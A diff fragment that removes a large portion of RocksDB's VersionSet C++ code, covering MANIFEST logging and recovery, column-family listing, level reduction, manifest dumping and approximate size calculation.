-      s = NewWritableFile(
-          env_, DescriptorFileName(dbname_, pending_manifest_file_number_),
-          &descriptor_file, opt_env_opts);
-      if (s.ok()) {
-        descriptor_file->SetPreallocationBlockSize(
-            db_options_->manifest_preallocation_size);
-
-        unique_ptr<WritableFileWriter> file_writer(
-            new WritableFileWriter(std::move(descriptor_file), opt_env_opts));
-        descriptor_log_.reset(
-            new log::Writer(std::move(file_writer), 0, false));
-        s = WriteSnapshot(descriptor_log_.get());
-      }
-    }
-
-    if (!w.edit_list.front()->IsColumnFamilyManipulation()) {
-      // This is cpu-heavy operations, which should be called outside mutex.
-      v->PrepareApply(mutable_cf_options, true);
-    }
-
-    // Write new record to MANIFEST log
-    if (s.ok()) {
-      for (auto& e : batch_edits) {
-        std::string record;
-        if (!e->EncodeTo(&record)) {
-          s = Status::Corruption(
-              "Unable to Encode VersionEdit:" + e->DebugString(true));
-          break;
-        }
-        TEST_KILL_RANDOM("VersionSet::LogAndApply:BeforeAddRecord",
-                         rocksdb_kill_odds * REDUCE_ODDS2);
-        s = descriptor_log_->AddRecord(record);
-        if (!s.ok()) {
-          break;
-        }
-      }
-      if (s.ok()) {
-        s = SyncManifest(env_, db_options_, descriptor_log_->file());
-      }
-      if (!s.ok()) {
-        ROCKS_LOG_ERROR(db_options_->info_log, "MANIFEST write: %s\n",
-                        s.ToString().c_str());
-      }
-    }
-
-    // If we just created a new descriptor file, install it by writing a
-    // new CURRENT file that points to it.
-    if (s.ok() && new_descriptor_log) {
-      s = SetCurrentFile(env_, dbname_, pending_manifest_file_number_,
-                         db_directory);
-    }
-
-    if (s.ok()) {
-      // find offset in manifest file where this version is stored.
-      new_manifest_file_size = descriptor_log_->file()->GetFileSize();
-    }
-
-    if (w.edit_list.front()->is_column_family_drop_) {
-      TEST_SYNC_POINT("VersionSet::LogAndApply::ColumnFamilyDrop:0");
-      TEST_SYNC_POINT("VersionSet::LogAndApply::ColumnFamilyDrop:1");
-      TEST_SYNC_POINT("VersionSet::LogAndApply::ColumnFamilyDrop:2");
-    }
-
-    LogFlush(db_options_->info_log);
-    TEST_SYNC_POINT("VersionSet::LogAndApply:WriteManifestDone");
-    mu->Lock();
-  }
-
-  // Append the old mainfest file to the obsolete_manifests_ list to be deleted
-  // by PurgeObsoleteFiles later.
-  if (s.ok() && new_descriptor_log) {
-    obsolete_manifests_.emplace_back(
-        DescriptorFileName("", manifest_file_number_));
-  }
-
-  // Install the new version
-  if (s.ok()) {
-    if (w.edit_list.front()->is_column_family_add_) {
-      // no group commit on column family add
-      assert(batch_edits.size() == 1);
-      assert(new_cf_options != nullptr);
-      CreateColumnFamily(*new_cf_options, w.edit_list.front());
-    } else if (w.edit_list.front()->is_column_family_drop_) {
-      assert(batch_edits.size() == 1);
-      column_family_data->SetDropped();
-      if (column_family_data->Unref()) {
-        delete column_family_data;
-      }
-    } else {
-      uint64_t max_log_number_in_batch  = 0;
-      for (auto& e : batch_edits) {
-        if (e->has_log_number_) {
-          max_log_number_in_batch =
-              std::max(max_log_number_in_batch, e->log_number_);
-        }
-      }
-      if (max_log_number_in_batch != 0) {
-        assert(column_family_data->GetLogNumber() <= max_log_number_in_batch);
-        column_family_data->SetLogNumber(max_log_number_in_batch);
-      }
-      AppendVersion(column_family_data, v);
-    }
-
-    manifest_file_number_ = pending_manifest_file_number_;
-    manifest_file_size_ = new_manifest_file_size;
-    prev_log_number_ = w.edit_list.front()->prev_log_number_;
-  } else {
-    std::string version_edits;
-    for (auto& e : batch_edits) {
-      version_edits = version_edits + "\n" + e->DebugString(true);
-    }
-    ROCKS_LOG_ERROR(
-        db_options_->info_log,
-        "[%s] Error in committing version edit to MANIFEST: %s",
-        column_family_data ? column_family_data->GetName().c_str() : "<null>",
-        version_edits.c_str());
-    delete v;
-    if (new_descriptor_log) {
-      ROCKS_LOG_INFO(db_options_->info_log, "Deleting manifest %" PRIu64
-                                            " current manifest %" PRIu64 "\n",
-                     manifest_file_number_, pending_manifest_file_number_);
-      descriptor_log_.reset();
-      env_->DeleteFile(
-          DescriptorFileName(dbname_, pending_manifest_file_number_));
-    }
-  }
-  pending_manifest_file_number_ = 0;
-
-  // wake up all the waiting writers
-  while (true) {
-    ManifestWriter* ready = manifest_writers_.front();
-    manifest_writers_.pop_front();
-    if (ready != &w) {
-      ready->status = s;
-      ready->done = true;
-      ready->cv.Signal();
-    }
-    if (ready == last_writer) break;
-  }
-  // Notify new head of write queue
-  if (!manifest_writers_.empty()) {
-    manifest_writers_.front()->cv.Signal();
-  }
-  return s;
-}
-
-void VersionSet::LogAndApplyCFHelper(VersionEdit* edit) {
-  assert(edit->IsColumnFamilyManipulation());
-  edit->SetNextFile(next_file_number_.load());
-  edit->SetLastSequence(last_sequence_);
-  if (edit->is_column_family_drop_) {
-    // if we drop column family, we have to make sure to save max column family,
-    // so that we don't reuse existing ID
-    edit->SetMaxColumnFamily(column_family_set_->GetMaxColumnFamily());
-  }
-}
-
-void VersionSet::LogAndApplyHelper(ColumnFamilyData* cfd,
-                                   VersionBuilder* builder, Version* v,
-                                   VersionEdit* edit, InstrumentedMutex* mu) {
-  mu->AssertHeld();
-  assert(!edit->IsColumnFamilyManipulation());
-
-  if (edit->has_log_number_) {
-    assert(edit->log_number_ >= cfd->GetLogNumber());
-    assert(edit->log_number_ < next_file_number_.load());
-  }
-
-  if (!edit->has_prev_log_number_) {
-    edit->SetPrevLogNumber(prev_log_number_);
-  }
-  edit->SetNextFile(next_file_number_.load());
-  edit->SetLastSequence(last_sequence_);
-
-  builder->Apply(edit);
-}
-
-Status VersionSet::Recover(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    bool read_only) {
-  std::unordered_map<std::string, ColumnFamilyOptions> cf_name_to_options;
-  for (auto cf : column_families) {
-    cf_name_to_options.insert({cf.name, cf.options});
-  }
-  // keeps track of column families in manifest that were not found in
-  // column families parameters. if those column families are not dropped
-  // by subsequent manifest records, Recover() will return failure status
-  std::unordered_map<int, std::string> column_families_not_found;
-
-  // Read "CURRENT" file, which contains a pointer to the current manifest file
-  std::string manifest_filename;
-  Status s = ReadFileToString(
-      env_, CurrentFileName(dbname_), &manifest_filename
-  );
-  if (!s.ok()) {
-    return s;
-  }
-  if (manifest_filename.empty() ||
-      manifest_filename.back() != '\n') {
-    return Status::Corruption("CURRENT file does not end with newline");
-  }
-  // remove the trailing '\n'
-  manifest_filename.resize(manifest_filename.size() - 1);
-  FileType type;
-  bool parse_ok =
-      ParseFileName(manifest_filename, &manifest_file_number_, &type);
-  if (!parse_ok || type != kDescriptorFile) {
-    return Status::Corruption("CURRENT file corrupted");
-  }
-
-  ROCKS_LOG_INFO(db_options_->info_log, "Recovering from manifest file: %s\n",
-                 manifest_filename.c_str());
-
-  manifest_filename = dbname_ + "/" + manifest_filename;
-  unique_ptr<SequentialFileReader> manifest_file_reader;
-  {
-    unique_ptr<SequentialFile> manifest_file;
-    s = env_->NewSequentialFile(manifest_filename, &manifest_file,
-                                env_->OptimizeForManifestRead(env_options_));
-    if (!s.ok()) {
-      return s;
-    }
-    manifest_file_reader.reset(
-        new SequentialFileReader(std::move(manifest_file)));
-  }
-  uint64_t current_manifest_file_size;
-  s = env_->GetFileSize(manifest_filename, &current_manifest_file_size);
-  if (!s.ok()) {
-    return s;
-  }
-
-  bool have_log_number = false;
-  bool have_prev_log_number = false;
-  bool have_next_file = false;
-  bool have_last_sequence = false;
-  uint64_t next_file = 0;
-  uint64_t last_sequence = 0;
-  uint64_t log_number = 0;
-  uint64_t previous_log_number = 0;
-  uint32_t max_column_family = 0;
-  std::unordered_map<uint32_t, BaseReferencedVersionBuilder*> builders;
-
-  // add default column family
-  auto default_cf_iter = cf_name_to_options.find(kDefaultColumnFamilyName);
-  if (default_cf_iter == cf_name_to_options.end()) {
-    return Status::InvalidArgument("Default column family not specified");
-  }
-  VersionEdit default_cf_edit;
-  default_cf_edit.AddColumnFamily(kDefaultColumnFamilyName);
-  default_cf_edit.SetColumnFamily(0);
-  ColumnFamilyData* default_cfd =
-      CreateColumnFamily(default_cf_iter->second, &default_cf_edit);
-  // In recovery, nobody else can access it, so it's fine to set it to be
-  // initialized earlier.
-  default_cfd->set_initialized();
-  builders.insert({0, new BaseReferencedVersionBuilder(default_cfd)});
-
-  {
-    VersionSet::LogReporter reporter;
-    reporter.status = &s;
-    log::Reader reader(NULL, std::move(manifest_file_reader), &reporter,
-                       true /*checksum*/, 0 /*initial_offset*/, 0);
-    Slice record;
-    std::string scratch;
-    while (reader.ReadRecord(&record, &scratch) && s.ok()) {
-      VersionEdit edit;
-      s = edit.DecodeFrom(record);
-      if (!s.ok()) {
-        break;
-      }
-
-      // Not found means that user didn't supply that column
-      // family option AND we encountered column family add
-      // record. Once we encounter column family drop record,
-      // we will delete the column family from
-      // column_families_not_found.
-      bool cf_in_not_found =
-          column_families_not_found.find(edit.column_family_) !=
-          column_families_not_found.end();
-      // in builders means that user supplied that column family
-      // option AND that we encountered column family add record
-      bool cf_in_builders =
-          builders.find(edit.column_family_) != builders.end();
-
-      // they can't both be true
-      assert(!(cf_in_not_found && cf_in_builders));
-
-      ColumnFamilyData* cfd = nullptr;
-
-      if (edit.is_column_family_add_) {
-        if (cf_in_builders || cf_in_not_found) {
-          s = Status::Corruption(
-              "Manifest adding the same column family twice");
-          break;
-        }
-        auto cf_options = cf_name_to_options.find(edit.column_family_name_);
-        if (cf_options == cf_name_to_options.end()) {
-          column_families_not_found.insert(
-              {edit.column_family_, edit.column_family_name_});
-        } else {
-          cfd = CreateColumnFamily(cf_options->second, &edit);
-          cfd->set_initialized();
-          builders.insert(
-              {edit.column_family_, new BaseReferencedVersionBuilder(cfd)});
-        }
-      } else if (edit.is_column_family_drop_) {
-        if (cf_in_builders) {
-          auto builder = builders.find(edit.column_family_);
-          assert(builder != builders.end());
-          delete builder->second;
-          builders.erase(builder);
-          cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-          if (cfd->Unref()) {
-            delete cfd;
-            cfd = nullptr;
-          } else {
-            // who else can have reference to cfd!?
-            assert(false);
-          }
-        } else if (cf_in_not_found) {
-          column_families_not_found.erase(edit.column_family_);
-        } else {
-          s = Status::Corruption(
-              "Manifest - dropping non-existing column family");
-          break;
-        }
-      } else if (!cf_in_not_found) {
-        if (!cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest record referencing unknown column family");
-          break;
-        }
-
-        cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-        // this should never happen since cf_in_builders is true
-        assert(cfd != nullptr);
-
-        // if it is not column family add or column family drop,
-        // then it's a file add/delete, which should be forwarded
-        // to builder
-        auto builder = builders.find(edit.column_family_);
-        assert(builder != builders.end());
-        builder->second->version_builder()->Apply(&edit);
-      }
-
-      if (cfd != nullptr) {
-        if (edit.has_log_number_) {
-          if (cfd->GetLogNumber() > edit.log_number_) {
-            ROCKS_LOG_WARN(
-                db_options_->info_log,
-                "MANIFEST corruption detected, but ignored - Log numbers in "
-                "records NOT monotonically increasing");
-          } else {
-            cfd->SetLogNumber(edit.log_number_);
-            have_log_number = true;
-          }
-        }
-        if (edit.has_comparator_ &&
-            edit.comparator_ != cfd->user_comparator()->Name()) {
-          s = Status::InvalidArgument(
-              cfd->user_comparator()->Name(),
-              "does not match existing comparator " + edit.comparator_);
-          break;
-        }
-      }
-
-      if (edit.has_prev_log_number_) {
-        previous_log_number = edit.prev_log_number_;
-        have_prev_log_number = true;
-      }
-
-      if (edit.has_next_file_number_) {
-        next_file = edit.next_file_number_;
-        have_next_file = true;
-      }
-
-      if (edit.has_max_column_family_) {
-        max_column_family = edit.max_column_family_;
-      }
-
-      if (edit.has_last_sequence_) {
-        last_sequence = edit.last_sequence_;
-        have_last_sequence = true;
-      }
-    }
-  }
-
-  if (s.ok()) {
-    if (!have_next_file) {
-      s = Status::Corruption("no meta-nextfile entry in descriptor");
-    } else if (!have_log_number) {
-      s = Status::Corruption("no meta-lognumber entry in descriptor");
-    } else if (!have_last_sequence) {
-      s = Status::Corruption("no last-sequence-number entry in descriptor");
-    }
-
-    if (!have_prev_log_number) {
-      previous_log_number = 0;
-    }
-
-    column_family_set_->UpdateMaxColumnFamily(max_column_family);
-
-    MarkFileNumberUsedDuringRecovery(previous_log_number);
-    MarkFileNumberUsedDuringRecovery(log_number);
-  }
-
-  // there were some column families in the MANIFEST that weren't specified
-  // in the argument. This is OK in read_only mode
-  if (read_only == false && !column_families_not_found.empty()) {
-    std::string list_of_not_found;
-    for (const auto& cf : column_families_not_found) {
-      list_of_not_found += ", " + cf.second;
-    }
-    list_of_not_found = list_of_not_found.substr(2);
-    s = Status::InvalidArgument(
-        "You have to open all column families. Column families not opened: " +
-        list_of_not_found);
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *column_family_set_) {
-      assert(builders.count(cfd->GetID()) > 0);
-      auto* builder = builders[cfd->GetID()]->version_builder();
-      if (!builder->CheckConsistencyForNumLevels()) {
-        s = Status::InvalidArgument(
-            "db has more levels than options.num_levels");
-        break;
-      }
-    }
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *column_family_set_) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      assert(cfd->initialized());
-      auto builders_iter = builders.find(cfd->GetID());
-      assert(builders_iter != builders.end());
-      auto* builder = builders_iter->second->version_builder();
-
-      if (GetColumnFamilySet()->get_table_cache()->GetCapacity() ==
-          TableCache::kInfiniteCapacity) {
-        // unlimited table cache. Pre-load table handle now.
-        // Need to do it out of the mutex.
-        builder->LoadTableHandlers(
-            cfd->internal_stats(), db_options_->max_file_opening_threads,
-            false /* prefetch_index_and_filter_in_cache */);
-      }
-
-      Version* v = new Version(cfd, this, current_version_number_++);
-      builder->SaveTo(v->storage_info());
-
-      // Install recovered version
-      v->PrepareApply(*cfd->GetLatestMutableCFOptions(),
-          !(db_options_->skip_stats_update_on_db_open));
-      AppendVersion(cfd, v);
-    }
-
-    manifest_file_size_ = current_manifest_file_size;
-    next_file_number_.store(next_file + 1);
-    last_to_be_written_sequence_ = last_sequence;
-    last_sequence_ = last_sequence;
-    prev_log_number_ = previous_log_number;
-
-    ROCKS_LOG_INFO(
-        db_options_->info_log,
-        "Recovered from manifest file:%s succeeded,"
-        "manifest_file_number is %lu, next_file_number is %lu, "
-        "last_sequence is %lu, log_number is %lu,"
-        "prev_log_number is %lu,"
-        "max_column_family is %u\n",
-        manifest_filename.c_str(), (unsigned long)manifest_file_number_,
-        (unsigned long)next_file_number_.load(), (unsigned long)last_sequence_,
-        (unsigned long)log_number, (unsigned long)prev_log_number_,
-        column_family_set_->GetMaxColumnFamily());
-
-    for (auto cfd : *column_family_set_) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      ROCKS_LOG_INFO(db_options_->info_log,
-                     "Column family [%s] (ID %u), log number is %" PRIu64 "\n",
-                     cfd->GetName().c_str(), cfd->GetID(), cfd->GetLogNumber());
-    }
-  }
-
-  for (auto& builder : builders) {
-    delete builder.second;
-  }
-
-  return s;
-}
-
-Status VersionSet::ListColumnFamilies(std::vector<std::string>* column_families,
-                                      const std::string& dbname, Env* env) {
-  // these are just for performance reasons, not correcntes,
-  // so we're fine using the defaults
-  EnvOptions soptions;
-  // Read "CURRENT" file, which contains a pointer to the current manifest file
-  std::string current;
-  Status s = ReadFileToString(env, CurrentFileName(dbname), &current);
-  if (!s.ok()) {
-    return s;
-  }
-  if (current.empty() || current[current.size()-1] != '\n') {
-    return Status::Corruption("CURRENT file does not end with newline");
-  }
-  current.resize(current.size() - 1);
-
-  std::string dscname = dbname + "/" + current;
-
-  unique_ptr<SequentialFileReader> file_reader;
-  {
-  unique_ptr<SequentialFile> file;
-  s = env->NewSequentialFile(dscname, &file, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  file_reader.reset(new SequentialFileReader(std::move(file)));
-  }
-
-  std::map<uint32_t, std::string> column_family_names;
-  // default column family is always implicitly there
-  column_family_names.insert({0, kDefaultColumnFamilyName});
-  VersionSet::LogReporter reporter;
-  reporter.status = &s;
-  log::Reader reader(NULL, std::move(file_reader), &reporter, true /*checksum*/,
-                     0 /*initial_offset*/, 0);
-  Slice record;
-  std::string scratch;
-  while (reader.ReadRecord(&record, &scratch) && s.ok()) {
-    VersionEdit edit;
-    s = edit.DecodeFrom(record);
-    if (!s.ok()) {
-      break;
-    }
-    if (edit.is_column_family_add_) {
-      if (column_family_names.find(edit.column_family_) !=
-          column_family_names.end()) {
-        s = Status::Corruption("Manifest adding the same column family twice");
-        break;
-      }
-      column_family_names.insert(
-          {edit.column_family_, edit.column_family_name_});
-    } else if (edit.is_column_family_drop_) {
-      if (column_family_names.find(edit.column_family_) ==
-          column_family_names.end()) {
-        s = Status::Corruption(
-            "Manifest - dropping non-existing column family");
-        break;
-      }
-      column_family_names.erase(edit.column_family_);
-    }
-  }
-
-  column_families->clear();
-  if (s.ok()) {
-    for (const auto& iter : column_family_names) {
-      column_families->push_back(iter.second);
-    }
-  }
-
-  return s;
-}
-
-#ifndef ROCKSDB_LITE
-Status VersionSet::ReduceNumberOfLevels(const std::string& dbname,
-                                        const Options* options,
-                                        const EnvOptions& env_options,
-                                        int new_levels) {
-  if (new_levels <= 1) {
-    return Status::InvalidArgument(
-        "Number of levels needs to be bigger than 1");
-  }
-
-  ImmutableDBOptions db_options(*options);
-  ColumnFamilyOptions cf_options(*options);
-  std::shared_ptr<Cache> tc(NewLRUCache(options->max_open_files - 10,
-                                        options->table_cache_numshardbits));
-  WriteController wc(options->delayed_write_rate);
-  WriteBufferManager wb(options->db_write_buffer_size);
-  VersionSet versions(dbname, &db_options, env_options, tc.get(), &wb, &wc);
-  Status status;
-
-  std::vector<ColumnFamilyDescriptor> dummy;
-  ColumnFamilyDescriptor dummy_descriptor(kDefaultColumnFamilyName,
-                                          ColumnFamilyOptions(*options));
-  dummy.push_back(dummy_descriptor);
-  status = versions.Recover(dummy);
-  if (!status.ok()) {
-    return status;
-  }
-
-  Version* current_version =
-      versions.GetColumnFamilySet()->GetDefault()->current();
-  auto* vstorage = current_version->storage_info();
-  int current_levels = vstorage->num_levels();
-
-  if (current_levels <= new_levels) {
-    return Status::OK();
-  }
-
-  // Make sure there are file only on one level from
-  // (new_levels-1) to (current_levels-1)
-  int first_nonempty_level = -1;
-  int first_nonempty_level_filenum = 0;
-  for (int i = new_levels - 1; i < current_levels; i++) {
-    int file_num = vstorage->NumLevelFiles(i);
-    if (file_num != 0) {
-      if (first_nonempty_level < 0) {
-        first_nonempty_level = i;
-        first_nonempty_level_filenum = file_num;
-      } else {
-        char msg[255];
-        snprintf(msg, sizeof(msg),
-                 "Found at least two levels containing files: "
-                 "[%d:%d],[%d:%d].\n",
-                 first_nonempty_level, first_nonempty_level_filenum, i,
-                 file_num);
-        return Status::InvalidArgument(msg);
-      }
-    }
-  }
-
-  // we need to allocate an array with the old number of levels size to
-  // avoid SIGSEGV in WriteSnapshot()
-  // however, all levels bigger or equal to new_levels will be empty
-  std::vector<FileMetaData*>* new_files_list =
-      new std::vector<FileMetaData*>[current_levels];
-  for (int i = 0; i < new_levels - 1; i++) {
-    new_files_list[i] = vstorage->LevelFiles(i);
-  }
-
-  if (first_nonempty_level > 0) {
-    new_files_list[new_levels - 1] = vstorage->LevelFiles(first_nonempty_level);
-  }
-
-  delete[] vstorage -> files_;
-  vstorage->files_ = new_files_list;
-  vstorage->num_levels_ = new_levels;
-
-  MutableCFOptions mutable_cf_options(*options);
-  VersionEdit ve;
-  InstrumentedMutex dummy_mutex;
-  InstrumentedMutexLock l(&dummy_mutex);
-  return versions.LogAndApply(
-      versions.GetColumnFamilySet()->GetDefault(),
-      mutable_cf_options, &ve, &dummy_mutex, nullptr, true);
-}
-
-Status VersionSet::DumpManifest(Options& options, std::string& dscname,
-                                bool verbose, bool hex, bool json) {
-  // Open the specified manifest file.
-  unique_ptr<SequentialFileReader> file_reader;
-  Status s;
-  {
-    unique_ptr<SequentialFile> file;
-    s = options.env->NewSequentialFile(
-        dscname, &file, env_->OptimizeForManifestRead(env_options_));
-    if (!s.ok()) {
-      return s;
-    }
-    file_reader.reset(new SequentialFileReader(std::move(file)));
-  }
-
-  bool have_prev_log_number = false;
-  bool have_next_file = false;
-  bool have_last_sequence = false;
-  uint64_t next_file = 0;
-  uint64_t last_sequence = 0;
-  uint64_t previous_log_number = 0;
-  int count = 0;
-  std::unordered_map<uint32_t, std::string> comparators;
-  std::unordered_map<uint32_t, BaseReferencedVersionBuilder*> builders;
-
-  // add default column family
-  VersionEdit default_cf_edit;
-  default_cf_edit.AddColumnFamily(kDefaultColumnFamilyName);
-  default_cf_edit.SetColumnFamily(0);
-  ColumnFamilyData* default_cfd =
-      CreateColumnFamily(ColumnFamilyOptions(options), &default_cf_edit);
-  builders.insert({0, new BaseReferencedVersionBuilder(default_cfd)});
-
-  {
-    VersionSet::LogReporter reporter;
-    reporter.status = &s;
-    log::Reader reader(NULL, std::move(file_reader), &reporter,
-                       true /*checksum*/, 0 /*initial_offset*/, 0);
-    Slice record;
-    std::string scratch;
-    while (reader.ReadRecord(&record, &scratch) && s.ok()) {
-      VersionEdit edit;
-      s = edit.DecodeFrom(record);
-      if (!s.ok()) {
-        break;
-      }
-
-      // Write out each individual edit
-      if (verbose && !json) {
-        printf("%s\n", edit.DebugString(hex).c_str());
-      } else if (json) {
-        printf("%s\n", edit.DebugJSON(count, hex).c_str());
-      }
-      count++;
-
-      bool cf_in_builders =
-          builders.find(edit.column_family_) != builders.end();
-
-      if (edit.has_comparator_) {
-        comparators.insert({edit.column_family_, edit.comparator_});
-      }
-
-      ColumnFamilyData* cfd = nullptr;
-
-      if (edit.is_column_family_add_) {
-        if (cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest adding the same column family twice");
-          break;
-        }
-        cfd = CreateColumnFamily(ColumnFamilyOptions(options), &edit);
-        cfd->set_initialized();
-        builders.insert(
-            {edit.column_family_, new BaseReferencedVersionBuilder(cfd)});
-      } else if (edit.is_column_family_drop_) {
-        if (!cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest - dropping non-existing column family");
-          break;
-        }
-        auto builder_iter = builders.find(edit.column_family_);
-        delete builder_iter->second;
-        builders.erase(builder_iter);
-        comparators.erase(edit.column_family_);
-        cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-        assert(cfd != nullptr);
-        cfd->Unref();
-        delete cfd;
-        cfd = nullptr;
-      } else {
-        if (!cf_in_builders) {
-          s = Status::Corruption(
-              "Manifest record referencing unknown column family");
-          break;
-        }
-
-        cfd = column_family_set_->GetColumnFamily(edit.column_family_);
-        // this should never happen since cf_in_builders is true
-        assert(cfd != nullptr);
-
-        // if it is not column family add or column family drop,
-        // then it's a file add/delete, which should be forwarded
-        // to builder
-        auto builder = builders.find(edit.column_family_);
-        assert(builder != builders.end());
-        builder->second->version_builder()->Apply(&edit);
-      }
-
-      if (cfd != nullptr && edit.has_log_number_) {
-        cfd->SetLogNumber(edit.log_number_);
-      }
-
-      if (edit.has_prev_log_number_) {
-        previous_log_number = edit.prev_log_number_;
-        have_prev_log_number = true;
-      }
-
-      if (edit.has_next_file_number_) {
-        next_file = edit.next_file_number_;
-        have_next_file = true;
-      }
-
-      if (edit.has_last_sequence_) {
-        last_sequence = edit.last_sequence_;
-        have_last_sequence = true;
-      }
-
-      if (edit.has_max_column_family_) {
-        column_family_set_->UpdateMaxColumnFamily(edit.max_column_family_);
-      }
-    }
-  }
-  file_reader.reset();
-
-  if (s.ok()) {
-    if (!have_next_file) {
-      s = Status::Corruption("no meta-nextfile entry in descriptor");
-      printf("no meta-nextfile entry in descriptor");
-    } else if (!have_last_sequence) {
-      printf("no last-sequence-number entry in descriptor");
-      s = Status::Corruption("no last-sequence-number entry in descriptor");
-    }
-
-    if (!have_prev_log_number) {
-      previous_log_number = 0;
-    }
-  }
-
-  if (s.ok()) {
-    for (auto cfd : *column_family_set_) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      auto builders_iter = builders.find(cfd->GetID());
-      assert(builders_iter != builders.end());
-      auto builder = builders_iter->second->version_builder();
-
-      Version* v = new Version(cfd, this, current_version_number_++);
-      builder->SaveTo(v->storage_info());
-      v->PrepareApply(*cfd->GetLatestMutableCFOptions(), false);
-
-      printf("--------------- Column family \"%s\"  (ID %u) --------------\n",
-             cfd->GetName().c_str(), (unsigned int)cfd->GetID());
-      printf("log number: %lu\n", (unsigned long)cfd->GetLogNumber());
-      auto comparator = comparators.find(cfd->GetID());
-      if (comparator != comparators.end()) {
-        printf("comparator: %s\n", comparator->second.c_str());
-      } else {
-        printf("comparator: <NO COMPARATOR>\n");
-      }
-      printf("%s \n", v->DebugString(hex).c_str());
-      delete v;
-    }
-
-    // Free builders
-    for (auto& builder : builders) {
-      delete builder.second;
-    }
-
-    next_file_number_.store(next_file + 1);
-    last_to_be_written_sequence_ = last_sequence;
-    last_sequence_ = last_sequence;
-    prev_log_number_ = previous_log_number;
-
-    printf(
-        "next_file_number %lu last_sequence "
-        "%lu  prev_log_number %lu max_column_family %u\n",
-        (unsigned long)next_file_number_.load(), (unsigned long)last_sequence,
-        (unsigned long)previous_log_number,
-        column_family_set_->GetMaxColumnFamily());
-  }
-
-  return s;
-}
-#endif  // ROCKSDB_LITE
-
-void VersionSet::MarkFileNumberUsedDuringRecovery(uint64_t number) {
-  // only called during recovery which is single threaded, so this works because
-  // there can't be concurrent calls
-  if (next_file_number_.load(std::memory_order_relaxed) <= number) {
-    next_file_number_.store(number + 1, std::memory_order_relaxed);
-  }
-}
-
-Status VersionSet::WriteSnapshot(log::Writer* log) {
-  // TODO: Break up into multiple records to reduce memory usage on recovery?
-
-  // WARNING: This method doesn't hold a mutex!!
-
-  // This is done without DB mutex lock held, but only within single-threaded
-  // LogAndApply. Column family manipulations can only happen within LogAndApply
-  // (the same single thread), so we're safe to iterate.
-  for (auto cfd : *column_family_set_) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    assert(cfd->initialized());
-    {
-      // Store column family info
-      VersionEdit edit;
-      if (cfd->GetID() != 0) {
-        // default column family is always there,
-        // no need to explicitly write it
-        edit.AddColumnFamily(cfd->GetName());
-        edit.SetColumnFamily(cfd->GetID());
-      }
-      edit.SetComparatorName(
-          cfd->internal_comparator().user_comparator()->Name());
-      std::string record;
-      if (!edit.EncodeTo(&record)) {
-        return Status::Corruption(
-            "Unable to Encode VersionEdit:" + edit.DebugString(true));
-      }
-      Status s = log->AddRecord(record);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-
-    {
-      // Save files
-      VersionEdit edit;
-      edit.SetColumnFamily(cfd->GetID());
-
-      for (int level = 0; level < cfd->NumberLevels(); level++) {
-        for (const auto& f :
-             cfd->current()->storage_info()->LevelFiles(level)) {
-          edit.AddFile(level, f->fd.GetNumber(), f->fd.GetPathId(),
-                       f->fd.GetFileSize(), f->smallest, f->largest,
-                       f->smallest_seqno, f->largest_seqno,
-                       f->marked_for_compaction);
-        }
-      }
-      edit.SetLogNumber(cfd->GetLogNumber());
-      std::string record;
-      if (!edit.EncodeTo(&record)) {
-        return Status::Corruption(
-            "Unable to Encode VersionEdit:" + edit.DebugString(true));
-      }
-      Status s = log->AddRecord(record);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-
-  return Status::OK();
-}
-
-// TODO(aekmekji): in CompactionJob::GenSubcompactionBoundaries(), this
-// function is called repeatedly with consecutive pairs of slices. For example
-// if the slice list is [a, b, c, d] this function is called with arguments
-// (a,b) then (b,c) then (c,d). Knowing this, an optimization is possible where
-// we avoid doing binary search for the keys b and c twice and instead somehow
-// maintain state of where they first appear in the files.
-uint64_t VersionSet::ApproximateSize(Version* v, const Slice& start,
-                                     const Slice& end, int start_level,
-                                     int end_level) {
-  // pre-condition
-  assert(v->cfd_->internal_comparator().Compare(start, end) <= 0);
-
-  uint64_t size = 0;
-  const auto* vstorage = v->storage_info();
-  end_level = end_level == -1
-                  ? vstorage->num_non_empty_levels()
-                  : std::min(end_level, vstorage->num_non_empty_levels());
-
-  assert(start_level <= end_level);
-
-  for (int level = start_level; level < end_level; level++) {
-    const LevelFilesBrief& files_brief = vstorage->LevelFilesBrief(level);
-    if (!files_brief.num_files) {
-      // empty level, skip exploration
-      continue;
-    }
-
-    if (!level) {
-      // level 0 data is sorted order, handle the use case explicitly
-      size += ApproximateSizeLevel0(v, files_brief, start, end);
-      continue;
-    }
-
-    assert(level > 0);
-    assert(files_brief.num_files > 0);
-
-    // identify the file position for starting key
-    const uint64_t idx_start = FindFileInRange(
-        v->cfd_->internal_comparator(), files_brief, start,
-        /*start=*/0, static_cast<uint32_t>(files_brief.num_files - 1));
-    assert(idx_start < files_brief.num_files);
-
-    // scan all files from the starting position until the ending position
-    // inferred from the sorted order
-    for (uint64_t i = idx_start; i < files_brief.num_files; i++) {
-      uint64_t val;
-      val = ApproximateSize(v, files_brief.files[i], end);
-      if (!val) {
-        // the files after this will not have the range
-        break;
-      }
-
-      size += val;
-
-      if (i == idx_start) {
-        // subtract the bytes needed to be scanned to get to the starting
-        // key
-        val = ApproximateSize(v, files_brief.files[i], start);
-        assert(size >= val);
-        size -= val;
-      }
-    }
-  }
-
-  return size;
-}
-
-uint64_t VersionSet::ApproximateSizeLevel0(Version* v,
-                                           const LevelFilesBrief& files_brief,
-                                           const Slice& key_start,
-                                           const Slice& key_end) {
-  // level 0 files are not in sorted order, we need to iterate through
-  // the list to compute the total bytes that require scanning
-  uint64_t size = 0;
-  for (size_t i = 0; i < files_brief.num_files; i++) {
-    const uint64_t start = ApproximateSize(v, files_brief.files[i], key_start);
-    const uint64_t end = ApproximateSize(v, files_brief.files[i], key_end);
-    assert(end >= start);
-    size += end - start;
-  }
-  return size;
-}
-
